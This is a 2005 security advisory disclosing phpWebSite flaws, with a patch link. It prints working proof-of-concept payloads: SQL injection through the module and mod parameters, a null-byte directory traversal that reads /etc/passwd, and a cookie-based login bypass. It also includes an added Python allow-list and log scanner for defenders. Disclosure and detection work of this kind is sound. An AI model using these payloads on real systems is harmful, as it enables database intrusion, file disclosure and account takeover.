HSC Research Group - Advisories
Written by Hackers Center
Wednesday, 06 July 2005 16:19
Dcrab's Security Advisory - http://www.dbtech.org - Deadbolt Computer Technologies
Get Dcrab's services to audit your web servers, scripts, networks, etc., or even to code them. Learn more at http://www.dbtech.org
Severity: High
Title: Phpwebsite has multiple serious vulnerabilities
Date: 7/07/2005
Vendor: Phpwebsite
Vendor Website: http://phpwebsite.appstate.edu
Vendor Status: Contacted and patch has been released
Summary: There are multiple SQL injection, authentication bypass and directory traversal vulnerabilities in Phpwebsite.
Proof of Concept Exploits:

SQL injection (module parameter):
www.example.com/phpwebsite/index.php?module='&search_op=search&mod=all&query=1&search=Search

DB Error: syntax error SELECT show_block, block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

SQL injection (mod parameter):
www.example.com/phpwebsite/index.php?module=search&search_op=search&mod='&query=1&search=Search

DB Error: syntax error SELECT block_title FROM mod_search WHERE module=''' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

Directory traversal (mod parameter):
www.example.com/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News
Authentication bypass (remember-me cookie):
Log into a user account with "remember me" checked, then delete all the cookies except the one with [mod_users][rememberme] in its name.
Cookie name: *an md5 hash set by the website*[mod_users][rememberme]
Value: a' or 'a' = 'a
You can also steal specific user accounts by setting the cookie value to: a' or user_id = '5'
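All three request-based vectors above pass through the same two parameters, module and mod, which phpWebSite only ever uses as a module identifier. The following is an added defender-side example (not code from the advisory or from the phpWebSite project): an allow-list check for those parameters, run over request URLs and over constructed access-log lines carrying the advisory's proof-of-concept requests; the hosts, client IPs and timestamps in the sample log are hypothetical.

```python
# Added example, not from the advisory or phpWebSite: allow-list check for the
# module/mod request parameters the advisory shows being abused, applied to URLs
# and to constructed access-log lines.
import re
from urllib.parse import parse_qs, urlsplit

# phpWebSite module names are plain identifiers; anything else must never
# reach a SQL string or a filesystem path.
MODULE_NAME = re.compile(r"^[A-Za-z0-9_]{1,64}$")
CLF_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def classify_module_param(value):
    """Return 'ok' or the reason the value must be rejected."""
    if "\x00" in value:
        return "null byte"
    if "/" in value or "\\" in value or ".." in value:
        return "path traversal"
    if "'" in value or '"' in value:
        return "quote in identifier"
    if not MODULE_NAME.match(value):
        return "not a module identifier"
    return "ok"

def audit_request(url):
    """Map each module/mod parameter of a request URL to its verdict.
    parse_qs percent-decodes, so %00 is a real NUL by the time it is checked."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: classify_module_param(value)
            for name in ("module", "mod")
            for value in params.get(name, [])}

def scan_access_log(lines):
    """Return (line number, verdicts) for each log line with a rejected value."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = CLF_REQUEST.search(line)
        if match:
            verdicts = audit_request(match.group(1))
            if any(v != "ok" for v in verdicts.values()):
                hits.append((number, verdicts))
    return hits

# Constructed sample log (hypothetical client IPs and timestamps): one legitimate
# search followed by the advisory's three proof-of-concept requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Jul/2005:16:19:01 +0000] "GET /phpwebsite/index.php?module=search&search_op=search&mod=all&query=1&search=Search HTTP/1.0" 200 5120',
    '10.0.0.9 - - [06/Jul/2005:16:19:07 +0000] "GET /phpwebsite/index.php?module=\'&search_op=search&mod=all&query=1&search=Search HTTP/1.0" 200 812',
    '10.0.0.9 - - [06/Jul/2005:16:19:12 +0000] "GET /phpwebsite/index.php?module=search&search_op=search&mod=\'&query=1&search=Search HTTP/1.0" 200 790',
    '10.0.0.9 - - [06/Jul/2005:16:19:20 +0000] "GET /phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search HTTP/1.0" 200 1420',
]
```

The same classify_module_param check applied to the remember-me cookie value rejects it for the quote character, so a single identifier allow-list covers every vector in this advisory.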
Solution: The vendors were contacted via email and responded quickly. The issue was reported to them, after which a patch was released on their official website.
You can get the security patch at http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_patch_20050705.2.tgz
Keep yourself updated: RSS feed at http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
Author: These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my forthcoming book on secure coding with PHP.